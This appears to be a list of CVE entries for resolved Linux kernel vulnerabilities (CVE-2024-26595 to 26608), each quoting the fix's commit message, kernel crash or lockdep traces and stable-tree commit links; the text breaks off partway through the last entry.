CVE    2024    26608    Candidate    In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix global oob in ksmbd_nl_policy Similar to a reported issue (check the commit b33fb5b801c6 ("net: qualcomm: rmnet: fix global oob in rmnet_policy"), my local fuzzer finds another global out-of-bounds read for policy ksmbd_nl_policy. See bug trace below: ================================================================== BUG: KASAN: global-out-of-bounds in validate_nla lib/nlattr.c:386 [inline] BUG: KASAN: global-out-of-bounds in __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 Read of size 1 at addr ffffffff8f24b100 by task syz-executor.1/62810 CPU: 0 PID: 62810 Comm: syz-executor.1 Tainted: G N 6.1.0 #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x8b/0xb3 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:284 [inline] print_report+0x172/0x475 mm/kasan/report.c:395 kasan_report+0xbb/0x1c0 mm/kasan/report.c:495 validate_nla lib/nlattr.c:386 [inline] __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 __nla_parse+0x3e/0x50 lib/nlattr.c:697 __nlmsg_parse include/net/netlink.h:748 [inline] genl_family_rcv_msg_attrs_parse.constprop.0+0x1b0/0x290 net/netlink/genetlink.c:565 genl_family_rcv_msg_doit+0xda/0x330 net/netlink/genetlink.c:734 genl_family_rcv_msg net/netlink/genetlink.c:833 [inline] genl_rcv_msg+0x441/0x780 net/netlink/genetlink.c:850 netlink_rcv_skb+0x14f/0x410 net/netlink/af_netlink.c:2540 genl_rcv+0x24/0x40 net/netlink/genetlink.c:861 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline] netlink_unicast+0x54e/0x800 net/netlink/af_netlink.c:1345 netlink_sendmsg+0x930/0xe50 net/netlink/af_netlink.c:1921 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg+0x154/0x190 net/socket.c:734 ____sys_sendmsg+0x6df/0x840 net/socket.c:2482 ___sys_sendmsg+0x110/0x1b0 net/socket.c:2536 __sys_sendmsg+0xf3/0x1c0 
net/socket.c:2565 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> The buggy address belongs to the variable: ksmbd_nl_policy+0x100/0xa80 ================================================================== To fix it, add a placeholder named __KSMBD_EVENT_MAX and let KSMBD_EVENT_MAX to be its original value - 1 according to what other netlink families do. Also change two sites that refer the KSMBD_EVENT_MAX to correct value.    
MISC:https://git.kernel.org/stable/c/2c939c74ef0b74e99b92e32edc2a59f9b9ca3d5a   |   URL:https://git.kernel.org/stable/c/2c939c74ef0b74e99b92e32edc2a59f9b9ca3d5a   |   MISC:https://git.kernel.org/stable/c/6993328a4cd62a24df254b587c0796a4a1eecc95   |   URL:https://git.kernel.org/stable/c/6993328a4cd62a24df254b587c0796a4a1eecc95   |   MISC:https://git.kernel.org/stable/c/9863a53100f47652755545c2bd43e14a1855104d   |   URL:https://git.kernel.org/stable/c/9863a53100f47652755545c2bd43e14a1855104d   |   MISC:https://git.kernel.org/stable/c/aaa1f1a2ee80888c12ae2783f3a0be10e14067c5   |   URL:https://git.kernel.org/stable/c/aaa1f1a2ee80888c12ae2783f3a0be10e14067c5   |   MISC:https://git.kernel.org/stable/c/ebeae8adf89d9a82359f6659b1663d09beec2faa   |   URL:https://git.kernel.org/stable/c/ebeae8adf89d9a82359f6659b1663d09beec2faa    Assigned (20240219)
CVE    2024    26607    Candidate    In the Linux kernel, the following vulnerability has been resolved: drm/bridge: sii902x: Fix probing race issue A null pointer dereference crash has been observed rarely on TI platforms using sii9022 bridge: [ 53.271356] sii902x_get_edid+0x34/0x70 [sii902x] [ 53.276066] sii902x_bridge_get_edid+0x14/0x20 [sii902x] [ 53.281381] drm_bridge_get_edid+0x20/0x34 [drm] [ 53.286305] drm_bridge_connector_get_modes+0x8c/0xcc [drm_kms_helper] [ 53.292955] drm_helper_probe_single_connector_modes+0x190/0x538 [drm_kms_helper] [ 53.300510] drm_client_modeset_probe+0x1f0/0xbd4 [drm] [ 53.305958] __drm_fb_helper_initial_config_and_unlock+0x50/0x510 [drm_kms_helper] [ 53.313611] drm_fb_helper_initial_config+0x48/0x58 [drm_kms_helper] [ 53.320039] drm_fbdev_dma_client_hotplug+0x84/0xd4 [drm_dma_helper] [ 53.326401] drm_client_register+0x5c/0xa0 [drm] [ 53.331216] drm_fbdev_dma_setup+0xc8/0x13c [drm_dma_helper] [ 53.336881] tidss_probe+0x128/0x264 [tidss] [ 53.341174] platform_probe+0x68/0xc4 [ 53.344841] really_probe+0x188/0x3c4 [ 53.348501] __driver_probe_device+0x7c/0x16c [ 53.352854] driver_probe_device+0x3c/0x10c [ 53.357033] __device_attach_driver+0xbc/0x158 [ 53.361472] bus_for_each_drv+0x88/0xe8 [ 53.365303] __device_attach+0xa0/0x1b4 [ 53.369135] device_initial_probe+0x14/0x20 [ 53.373314] bus_probe_device+0xb0/0xb4 [ 53.377145] deferred_probe_work_func+0xcc/0x124 [ 53.381757] process_one_work+0x1f0/0x518 [ 53.385770] worker_thread+0x1e8/0x3dc [ 53.389519] kthread+0x11c/0x120 [ 53.392750] ret_from_fork+0x10/0x20 The issue here is as follows: - tidss probes, but is deferred as sii902x is still missing. - sii902x starts probing and enters sii902x_init(). - sii902x calls drm_bridge_add(). Now the sii902x bridge is ready from DRM's perspective. - sii902x calls sii902x_audio_codec_init() and platform_device_register_data() - The registration of the audio platform device causes probing of the deferred devices. 
- tidss probes, which eventually causes sii902x_bridge_get_edid() to be called. - sii902x_bridge_get_edid() tries to use the i2c to read the edid. However, the sii902x driver has not set up the i2c part yet, leading to the crash. Fix this by moving the drm_bridge_add() to the end of the sii902x_init(), which is also at the very end of sii902x_probe().    MISC:https://git.kernel.org/stable/c/08ac6f132dd77e40f786d8af51140c96c6d739c9   |   URL:https://git.kernel.org/stable/c/08ac6f132dd77e40f786d8af51140c96c6d739c9   |   MISC:https://git.kernel.org/stable/c/2a4c6af7934a7b4c304542c38fee35e09cc1770c   |   URL:https://git.kernel.org/stable/c/2a4c6af7934a7b4c304542c38fee35e09cc1770c   |   MISC:https://git.kernel.org/stable/c/56f96cf6eb11a1c2d594367c3becbfb06a855ec1   |   URL:https://git.kernel.org/stable/c/56f96cf6eb11a1c2d594367c3becbfb06a855ec1   |   MISC:https://git.kernel.org/stable/c/e0f83c234ea7a3dec1f84e5d02caa1c51664a076   |   URL:https://git.kernel.org/stable/c/e0f83c234ea7a3dec1f84e5d02caa1c51664a076    Assigned (20240219)
CVE    2024    26606    Candidate    In the Linux kernel, the following vulnerability has been resolved: binder: signal epoll threads of self-work In (e)poll mode, threads often depend on I/O events to determine when data is ready for consumption. Within binder, a thread may initiate a command via BINDER_WRITE_READ without a read buffer and then make use of epoll_wait() or similar to consume any responses afterwards. It is then crucial that epoll threads are signaled via wakeup when they queue their own work. Otherwise, they risk waiting indefinitely for an event leaving their work unhandled. What is worse, subsequent commands won't trigger a wakeup either as the thread has pending work.    MISC:https://git.kernel.org/stable/c/42beab162dcee1e691ee4934292d51581c29df61   |   URL:https://git.kernel.org/stable/c/42beab162dcee1e691ee4934292d51581c29df61   |   MISC:https://git.kernel.org/stable/c/82722b453dc2f967b172603e389ee7dc1b3137cc   |   URL:https://git.kernel.org/stable/c/82722b453dc2f967b172603e389ee7dc1b3137cc   |   MISC:https://git.kernel.org/stable/c/90e09c016d72b91e76de25f71c7b93d94cc3c769   |   URL:https://git.kernel.org/stable/c/90e09c016d72b91e76de25f71c7b93d94cc3c769   |   MISC:https://git.kernel.org/stable/c/93b372c39c40cbf179e56621e6bc48240943af69   |   URL:https://git.kernel.org/stable/c/93b372c39c40cbf179e56621e6bc48240943af69   |   MISC:https://git.kernel.org/stable/c/97830f3c3088638ff90b20dfba2eb4d487bf14d7   |   URL:https://git.kernel.org/stable/c/97830f3c3088638ff90b20dfba2eb4d487bf14d7   |   MISC:https://git.kernel.org/stable/c/a423042052ec2bdbf1e552e621e6a768922363cc   |   URL:https://git.kernel.org/stable/c/a423042052ec2bdbf1e552e621e6a768922363cc   |   MISC:https://git.kernel.org/stable/c/a7ae586f6f6024f490b8546c8c84670f96bb9b68   |   URL:https://git.kernel.org/stable/c/a7ae586f6f6024f490b8546c8c84670f96bb9b68   |   MISC:https://git.kernel.org/stable/c/dd64bb8329ce0ea27bc557e4160c2688835402ac   |   
URL:https://git.kernel.org/stable/c/dd64bb8329ce0ea27bc557e4160c2688835402ac    Assigned (20240219)
CVE    2024    26605    Candidate    In the Linux kernel, the following vulnerability has been resolved: PCI/ASPM: Fix deadlock when enabling ASPM A last minute revert in 6.7-final introduced a potential deadlock when enabling ASPM during probe of Qualcomm PCIe controllers as reported by lockdep: ============================================ WARNING: possible recursive locking detected 6.7.0 #40 Not tainted -------------------------------------------- kworker/u16:5/90 is trying to acquire lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pcie_aspm_pm_state_change+0x58/0xdc but task is already holding lock: ffffacfa78ced000 (pci_bus_sem){++++}-{3:3}, at: pci_walk_bus+0x34/0xbc other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(pci_bus_sem); lock(pci_bus_sem); *** DEADLOCK *** Call trace: print_deadlock_bug+0x25c/0x348 __lock_acquire+0x10a4/0x2064 lock_acquire+0x1e8/0x318 down_read+0x60/0x184 pcie_aspm_pm_state_change+0x58/0xdc pci_set_full_power_state+0xa8/0x114 pci_set_power_state+0xc4/0x120 qcom_pcie_enable_aspm+0x1c/0x3c [pcie_qcom] pci_walk_bus+0x64/0xbc qcom_pcie_host_post_init_2_7_0+0x28/0x34 [pcie_qcom] The deadlock can easily be reproduced on machines like the Lenovo ThinkPad X13s by adding a delay to increase the race window during asynchronous probe where another thread can take a write lock. Add a new pci_set_power_state_locked() and associated helper functions that can be called with the PCI bus semaphore held to avoid taking the read lock twice.    MISC:https://git.kernel.org/stable/c/1e560864159d002b453da42bd2c13a1805515a20   |   URL:https://git.kernel.org/stable/c/1e560864159d002b453da42bd2c13a1805515a20   |   MISC:https://git.kernel.org/stable/c/ef90508574d7af48420bdc5f7b9a4f1cdd26bc70   |   URL:https://git.kernel.org/stable/c/ef90508574d7af48420bdc5f7b9a4f1cdd26bc70    Assigned (20240219)
CVE    2024    26604    Candidate    In the Linux kernel, the following vulnerability has been resolved: Revert "kobject: Remove redundant checks for whether ktype is NULL" This reverts commit 1b28cb81dab7c1eedc6034206f4e8d644046ad31. It is reported to cause problems, so revert it for now until the root cause can be found.    MISC:https://git.kernel.org/stable/c/3ca8fbabcceb8bfe44f7f50640092fd8f1de375c   |   URL:https://git.kernel.org/stable/c/3ca8fbabcceb8bfe44f7f50640092fd8f1de375c   |   MISC:https://git.kernel.org/stable/c/7f414d306320f837cc3df96cf52161cb8290fb1b   |   URL:https://git.kernel.org/stable/c/7f414d306320f837cc3df96cf52161cb8290fb1b   |   MISC:https://git.kernel.org/stable/c/b746d52ce7bcac325a2fa264216ead85b7fbbfaa   |   URL:https://git.kernel.org/stable/c/b746d52ce7bcac325a2fa264216ead85b7fbbfaa    Assigned (20240219)
CVE    2024    26603    Candidate    In the Linux kernel, the following vulnerability has been resolved: x86/fpu: Stop relying on userspace for info to fault in xsave buffer Before this change, the expected size of the user space buffer was taken from fx_sw->xstate_size. fx_sw->xstate_size can be changed from user-space, so it is possible to construct a sigreturn frame where: * fx_sw->xstate_size is smaller than the size required by valid bits in fx_sw->xfeatures. * user-space unmaps parts of the sigframe fpu buffer so that not all of the buffer required by xrstor is accessible. In this case, xrstor tries to restore and accesses the unmapped area which results in a fault. But fault_in_readable succeeds because buf + fx_sw->xstate_size is within the still mapped area, so it goes back and tries xrstor again. It will spin in this loop forever. Instead, fault in the maximum size which can be touched by XRSTOR (taken from fpstate->user_size). [ dhansen: tweak subject / changelog ]    MISC:https://git.kernel.org/stable/c/627339cccdc9166792ecf96bc3c9f711a60ce996   |   URL:https://git.kernel.org/stable/c/627339cccdc9166792ecf96bc3c9f711a60ce996   |   MISC:https://git.kernel.org/stable/c/627e28cbb65564e55008315d9e02fbb90478beda   |   URL:https://git.kernel.org/stable/c/627e28cbb65564e55008315d9e02fbb90478beda   |   MISC:https://git.kernel.org/stable/c/8bd3eee7720c14b59a206bd05b98d7586bccf99a   |   URL:https://git.kernel.org/stable/c/8bd3eee7720c14b59a206bd05b98d7586bccf99a   |   MISC:https://git.kernel.org/stable/c/b2479ab426cef7ab79a13005650eff956223ced2   |   URL:https://git.kernel.org/stable/c/b2479ab426cef7ab79a13005650eff956223ced2   |   MISC:https://git.kernel.org/stable/c/d877550eaf2dc9090d782864c96939397a3c6835   |   URL:https://git.kernel.org/stable/c/d877550eaf2dc9090d782864c96939397a3c6835    Assigned (20240219)
CVE    2024    26602    Candidate    In the Linux kernel, the following vulnerability has been resolved: sched/membarrier: reduce the ability to hammer on sys_membarrier On some systems, sys_membarrier can be very expensive, causing overall slowdowns for everything. So put a lock on the path in order to serialize the accesses to prevent the ability for this to be called at too high of a frequency and saturate the machine.    MISC:https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265   |   URL:https://git.kernel.org/stable/c/2441a64070b85c14eecc3728cc87e883f953f265   |   MISC:https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a   |   URL:https://git.kernel.org/stable/c/24ec7504a08a67247fbe798d1de995208a8c128a   |   MISC:https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3   |   URL:https://git.kernel.org/stable/c/3cd139875e9a7688b3fc715264032620812a5fa3   |   MISC:https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee   |   URL:https://git.kernel.org/stable/c/50fb4e17df319bb33be6f14e2a856950c1577dee   |   MISC:https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23   |   URL:https://git.kernel.org/stable/c/944d5fe50f3f03daacfea16300e656a1691c4a23   |   MISC:https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71   |   URL:https://git.kernel.org/stable/c/b6a2a9cbb67545c825ec95f06adb7ff300a2ad71   |   MISC:https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea   |   URL:https://git.kernel.org/stable/c/c5b2063c65d05e79fad8029324581d86cfba7eea   |   MISC:https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6   |   URL:https://git.kernel.org/stable/c/db896bbe4a9c67cee377e5f6a743350d3ae4acf6    Assigned (20240219)
CVE    2024    26601    Candidate    In the Linux kernel, the following vulnerability has been resolved: ext4: regenerate buddy after block freeing failed if under fc replay This mostly reverts commit 6bd97bf273bd ("ext4: remove redundant mb_regenerate_buddy()") and reintroduces mb_regenerate_buddy(). Based on code in mb_free_blocks(), fast commit replay can end up marking as free blocks that are already marked as such. This causes corruption of the buddy bitmap so we need to regenerate it in that case.    MISC:https://git.kernel.org/stable/c/6b0d48647935e4b8c7b75d1eccb9043fcd4ee581   |   URL:https://git.kernel.org/stable/c/6b0d48647935e4b8c7b75d1eccb9043fcd4ee581   |   MISC:https://git.kernel.org/stable/c/78327acd4cdc4a1601af718b781eece577b6b7d4   |   URL:https://git.kernel.org/stable/c/78327acd4cdc4a1601af718b781eece577b6b7d4   |   MISC:https://git.kernel.org/stable/c/94ebf71bddbcd4ab1ce43ae32c6cb66396d2d51a   |   URL:https://git.kernel.org/stable/c/94ebf71bddbcd4ab1ce43ae32c6cb66396d2d51a   |   MISC:https://git.kernel.org/stable/c/c1317822e2de80e78f137d3a2d99febab1b80326   |   URL:https://git.kernel.org/stable/c/c1317822e2de80e78f137d3a2d99febab1b80326   |   MISC:https://git.kernel.org/stable/c/c9b528c35795b711331ed36dc3dbee90d5812d4e   |   URL:https://git.kernel.org/stable/c/c9b528c35795b711331ed36dc3dbee90d5812d4e   |   MISC:https://git.kernel.org/stable/c/ea42d6cffb0dd27a417f410b9d0011e9859328cb   |   URL:https://git.kernel.org/stable/c/ea42d6cffb0dd27a417f410b9d0011e9859328cb    Assigned (20240219)
CVE    2024    26600    Candidate    In the Linux kernel, the following vulnerability has been resolved: phy: ti: phy-omap-usb2: Fix NULL pointer dereference for SRP If the external phy working together with phy-omap-usb2 does not implement send_srp(), we may still attempt to call it. This can happen on an idle Ethernet gadget triggering a wakeup for example: configfs-gadget.g1 gadget.0: ECM Suspend configfs-gadget.g1 gadget.0: Port suspended. Triggering wakeup ... Unable to handle kernel NULL pointer dereference at virtual address 00000000 when execute ... PC is at 0x0 LR is at musb_gadget_wakeup+0x1d4/0x254 [musb_hdrc] ... musb_gadget_wakeup [musb_hdrc] from usb_gadget_wakeup+0x1c/0x3c [udc_core] usb_gadget_wakeup [udc_core] from eth_start_xmit+0x3b0/0x3d4 [u_ether] eth_start_xmit [u_ether] from dev_hard_start_xmit+0x94/0x24c dev_hard_start_xmit from sch_direct_xmit+0x104/0x2e4 sch_direct_xmit from __dev_queue_xmit+0x334/0xd88 __dev_queue_xmit from arp_solicit+0xf0/0x268 arp_solicit from neigh_probe+0x54/0x7c neigh_probe from __neigh_event_send+0x22c/0x47c __neigh_event_send from neigh_resolve_output+0x14c/0x1c0 neigh_resolve_output from ip_finish_output2+0x1c8/0x628 ip_finish_output2 from ip_send_skb+0x40/0xd8 ip_send_skb from udp_send_skb+0x124/0x340 udp_send_skb from udp_sendmsg+0x780/0x984 udp_sendmsg from __sys_sendto+0xd8/0x158 __sys_sendto from ret_fast_syscall+0x0/0x58 Let's fix the issue by checking for send_srp() and set_vbus() before calling them. For USB peripheral only cases these both could be NULL.    MISC:https://git.kernel.org/stable/c/0430bfcd46657d9116a26cd377f112cbc40826a4   |   URL:https://git.kernel.org/stable/c/0430bfcd46657d9116a26cd377f112cbc40826a4   |   MISC:https://git.kernel.org/stable/c/14ef61594a5a286ae0d493b8acbf9eac46fd04c4   |   URL:https://git.kernel.org/stable/c/14ef61594a5a286ae0d493b8acbf9eac46fd04c4   |   MISC:https://git.kernel.org/stable/c/396e17af6761b3cc9e6e4ca94b4de7f642bfece1   |   URL:https://git.kernel.org/stable/c/396e17af6761b3cc9e6e4ca94b4de7f642bfece1   |   MISC:https://git.kernel.org/stable/c/486218c11e8d1c8f515a3bdd70d62203609d4b6b   |   URL:https://git.kernel.org/stable/c/486218c11e8d1c8f515a3bdd70d62203609d4b6b   |   MISC:https://git.kernel.org/stable/c/7104ba0f1958adb250319e68a15eff89ec4fd36d   |   URL:https://git.kernel.org/stable/c/7104ba0f1958adb250319e68a15eff89ec4fd36d   |   MISC:https://git.kernel.org/stable/c/8398d8d735ee93a04fb9e9f490e8cacd737e3bf5   |   URL:https://git.kernel.org/stable/c/8398d8d735ee93a04fb9e9f490e8cacd737e3bf5   |   MISC:https://git.kernel.org/stable/c/8cc889b9dea0579726be9520fcc766077890b462   |   URL:https://git.kernel.org/stable/c/8cc889b9dea0579726be9520fcc766077890b462   |   MISC:https://git.kernel.org/stable/c/be3b82e4871ba00e9b5d0ede92d396d579d7b3b3   |   URL:https://git.kernel.org/stable/c/be3b82e4871ba00e9b5d0ede92d396d579d7b3b3    Assigned (20240219)
CVE    2024    26599    Candidate    In the Linux kernel, the following vulnerability has been resolved: pwm: Fix out-of-bounds access in of_pwm_single_xlate() With args->args_count == 2 args->args[2] is not defined. Actually the flags are contained in args->args[1].    MISC:https://git.kernel.org/stable/c/7b85554c7c2aee91171e038e4d5442ffa130b282   |   URL:https://git.kernel.org/stable/c/7b85554c7c2aee91171e038e4d5442ffa130b282   |   MISC:https://git.kernel.org/stable/c/a297d07b9a1e4fb8cda25a4a2363a507d294b7c9   |   URL:https://git.kernel.org/stable/c/a297d07b9a1e4fb8cda25a4a2363a507d294b7c9   |   MISC:https://git.kernel.org/stable/c/bae45b7ebb31984b63b13c3519fd724b3ce92123   |   URL:https://git.kernel.org/stable/c/bae45b7ebb31984b63b13c3519fd724b3ce92123   |   MISC:https://git.kernel.org/stable/c/e5f2b4b62977fb6c2efcbc5779e0c9dce18215f7   |   URL:https://git.kernel.org/stable/c/e5f2b4b62977fb6c2efcbc5779e0c9dce18215f7    Assigned (20240219)
CVE    2024    26598    Candidate    In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: vgic-its: Avoid potential UAF in LPI translation cache There is a potential UAF scenario in the case of an LPI translation cache hit racing with an operation that invalidates the cache, such as a DISCARD ITS command. The root of the problem is that vgic_its_check_cache() does not elevate the refcount on the vgic_irq before dropping the lock that serializes refcount changes. Have vgic_its_check_cache() raise the refcount on the returned vgic_irq and add the corresponding decrement after queueing the interrupt.    MISC:https://git.kernel.org/stable/c/12c2759ab1343c124ed46ba48f27bd1ef5d2dff4   |   URL:https://git.kernel.org/stable/c/12c2759ab1343c124ed46ba48f27bd1ef5d2dff4   |   MISC:https://git.kernel.org/stable/c/65b201bf3e9af1b0254243a5881390eda56f72d1   |   URL:https://git.kernel.org/stable/c/65b201bf3e9af1b0254243a5881390eda56f72d1   |   MISC:https://git.kernel.org/stable/c/ad362fe07fecf0aba839ff2cc59a3617bd42c33f   |   URL:https://git.kernel.org/stable/c/ad362fe07fecf0aba839ff2cc59a3617bd42c33f   |   MISC:https://git.kernel.org/stable/c/ba7be666740847d967822bed15500656b26bc703   |   URL:https://git.kernel.org/stable/c/ba7be666740847d967822bed15500656b26bc703   |   MISC:https://git.kernel.org/stable/c/d04acadb6490aa3314f9c9e087691e55de153b88   |   URL:https://git.kernel.org/stable/c/d04acadb6490aa3314f9c9e087691e55de153b88   |   MISC:https://git.kernel.org/stable/c/dba788e25f05209adf2b0175eb1691dc89fb1ba6   |   URL:https://git.kernel.org/stable/c/dba788e25f05209adf2b0175eb1691dc89fb1ba6   |   MISC:https://git.kernel.org/stable/c/dd3956a1b3dd11f46488c928cb890d6937d1ca80   |   URL:https://git.kernel.org/stable/c/dd3956a1b3dd11f46488c928cb890d6937d1ca80    Assigned (20240219)
CVE    2024    26597    Candidate    In the Linux kernel, the following vulnerability has been resolved: net: qualcomm: rmnet: fix global oob in rmnet_policy The variable rmnet_link_ops assigns a *bigger* maxtype which leads to a global out-of-bounds read when parsing the netlink attributes. See bug trace below: ================================================================== BUG: KASAN: global-out-of-bounds in validate_nla lib/nlattr.c:386 [inline] BUG: KASAN: global-out-of-bounds in __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 Read of size 1 at addr ffffffff92c438d0 by task syz-executor.6/84207 CPU: 0 PID: 84207 Comm: syz-executor.6 Tainted: G N 6.1.0 #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x8b/0xb3 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:284 [inline] print_report+0x172/0x475 mm/kasan/report.c:395 kasan_report+0xbb/0x1c0 mm/kasan/report.c:495 validate_nla lib/nlattr.c:386 [inline] __nla_validate_parse+0x24af/0x2750 lib/nlattr.c:600 __nla_parse+0x3e/0x50 lib/nlattr.c:697 nla_parse_nested_deprecated include/net/netlink.h:1248 [inline] __rtnl_newlink+0x50a/0x1880 net/core/rtnetlink.c:3485 rtnl_newlink+0x64/0xa0 net/core/rtnetlink.c:3594 rtnetlink_rcv_msg+0x43c/0xd70 net/core/rtnetlink.c:6091 netlink_rcv_skb+0x14f/0x410 net/netlink/af_netlink.c:2540 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline] netlink_unicast+0x54e/0x800 net/netlink/af_netlink.c:1345 netlink_sendmsg+0x930/0xe50 net/netlink/af_netlink.c:1921 sock_sendmsg_nosec net/socket.c:714 [inline] sock_sendmsg+0x154/0x190 net/socket.c:734 ____sys_sendmsg+0x6df/0x840 net/socket.c:2482 ___sys_sendmsg+0x110/0x1b0 net/socket.c:2536 __sys_sendmsg+0xf3/0x1c0 net/socket.c:2565 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd [...] </TASK> The buggy address belongs to the variable: rmnet_policy+0x30/0xe0 [...] According to the comment of `nla_parse_nested_deprecated`, the maxtype should be len(destination array) - 1. Hence use `IFLA_RMNET_MAX` here.    MISC:https://git.kernel.org/stable/c/02467ab8b404d80429107588e0f3425cf5fcd2e5   |   URL:https://git.kernel.org/stable/c/02467ab8b404d80429107588e0f3425cf5fcd2e5   |   MISC:https://git.kernel.org/stable/c/093dab655808207f7a9f54cf156240aeafc70590   |   URL:https://git.kernel.org/stable/c/093dab655808207f7a9f54cf156240aeafc70590   |   MISC:https://git.kernel.org/stable/c/17d06a5c44d8fd2e8e61bac295b09153496f87e1   |   URL:https://git.kernel.org/stable/c/17d06a5c44d8fd2e8e61bac295b09153496f87e1   |   MISC:https://git.kernel.org/stable/c/2295c22348faf795e1ccdf618f6eb7afdb2f7447   |   URL:https://git.kernel.org/stable/c/2295c22348faf795e1ccdf618f6eb7afdb2f7447   |   MISC:https://git.kernel.org/stable/c/3b5254862258b595662a0ccca6e9eeb88d6e7468   |   URL:https://git.kernel.org/stable/c/3b5254862258b595662a0ccca6e9eeb88d6e7468   |   MISC:https://git.kernel.org/stable/c/b33fb5b801c6db408b774a68e7c8722796b59ecc   |   URL:https://git.kernel.org/stable/c/b33fb5b801c6db408b774a68e7c8722796b59ecc   |   MISC:https://git.kernel.org/stable/c/c4734535034672f59f2652e1e0058c490da62a5c   |   URL:https://git.kernel.org/stable/c/c4734535034672f59f2652e1e0058c490da62a5c   |   MISC:https://git.kernel.org/stable/c/ee1dc3bf86f2df777038506b139371a9add02534   |   URL:https://git.kernel.org/stable/c/ee1dc3bf86f2df777038506b139371a9add02534    Assigned (20240219)
CVE    2024    26596    Candidate    In the Linux kernel, the following vulnerability has been resolved: net: dsa: fix netdev_priv() dereference before check on non-DSA netdevice events After the blamed commit, we started doing this dereference for every NETDEV_CHANGEUPPER and NETDEV_PRECHANGEUPPER event in the system. static inline struct dsa_port *dsa_user_to_port(const struct net_device *dev) { struct dsa_user_priv *p = netdev_priv(dev); return p->dp; } Which is obviously bogus, because not all net_devices have a netdev_priv() of type struct dsa_user_priv. But struct dsa_user_priv is fairly small, and p->dp means dereferencing 8 bytes starting with offset 16. Most drivers allocate that much private memory anyway, making our access not fault, and we discard the bogus data quickly afterwards, so this wasn't caught. But the dummy interface is somewhat special in that it calls alloc_netdev() with a priv size of 0. So every netdev_priv() dereference is invalid, and we get this when we emit a NETDEV_PRECHANGEUPPER event with a VLAN as its new upper: $ ip link add dummy1 type dummy $ ip link add link dummy1 name dummy1.100 type vlan id 100 [ 43.309174] ================================================================== [ 43.316456] BUG: KASAN: slab-out-of-bounds in dsa_user_prechangeupper+0x30/0xe8 [ 43.323835] Read of size 8 at addr ffff3f86481d2990 by task ip/374 [ 43.330058] [ 43.342436] Call trace: [ 43.366542] dsa_user_prechangeupper+0x30/0xe8 [ 43.371024] dsa_user_netdevice_event+0xb38/0xee8 [ 43.375768] notifier_call_chain+0xa4/0x210 [ 43.379985] raw_notifier_call_chain+0x24/0x38 [ 43.384464] __netdev_upper_dev_link+0x3ec/0x5d8 [ 43.389120] netdev_upper_dev_link+0x70/0xa8 [ 43.393424] register_vlan_dev+0x1bc/0x310 [ 43.397554] vlan_newlink+0x210/0x248 [ 43.401247] rtnl_newlink+0x9fc/0xe30 [ 43.404942] rtnetlink_rcv_msg+0x378/0x580 Avoid the kernel oops by dereferencing after the type check, as customary.    MISC:https://git.kernel.org/stable/c/844f104790bd69c2e4dbb9ee3eba46fde1fcea7b   |   URL:https://git.kernel.org/stable/c/844f104790bd69c2e4dbb9ee3eba46fde1fcea7b   |   MISC:https://git.kernel.org/stable/c/dbd909c20c11f0d29c0054d41e0d1f668a60e8c8   |   URL:https://git.kernel.org/stable/c/dbd909c20c11f0d29c0054d41e0d1f668a60e8c8    Assigned (20240219)
CVE    2024    26595    Candidate    In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix NULL pointer dereference in error path When calling mlxsw_sp_acl_tcam_region_destroy() from an error path after failing to attach the region to an ACL group, we hit a NULL pointer dereference upon 'region->group->tcam' [1]. Fix by retrieving the 'tcam' pointer using mlxsw_sp_acl_to_tcam(). [1] BUG: kernel NULL pointer dereference, address: 0000000000000000 [...] RIP: 0010:mlxsw_sp_acl_tcam_region_destroy+0xa0/0xd0 [...] Call Trace: mlxsw_sp_acl_tcam_vchunk_get+0x88b/0xa20 mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0 mlxsw_sp_acl_rule_add+0x47/0x240 mlxsw_sp_flower_replace+0x1a9/0x1d0 tc_setup_cb_add+0xdc/0x1c0 fl_hw_replace_filter+0x146/0x1f0 fl_change+0xc17/0x1360 tc_new_tfilter+0x472/0xb90 rtnetlink_rcv_msg+0x313/0x3b0 netlink_rcv_skb+0x58/0x100 netlink_unicast+0x244/0x390 netlink_sendmsg+0x1e4/0x440 ____sys_sendmsg+0x164/0x260 ___sys_sendmsg+0x9a/0xe0 __sys_sendmsg+0x7a/0xc0 do_syscall_64+0x40/0xe0 entry_SYSCALL_64_after_hwframe+0x63/0x6b    MISC:https://git.kernel.org/stable/c/817840d125a370626895df269c50c923b79b0a39   |   URL:https://git.kernel.org/stable/c/817840d125a370626895df269c50c923b79b0a39   |   MISC:https://git.kernel.org/stable/c/d0a1efe417c97a1e9b914056ee6b86f1ef75fe1f   |   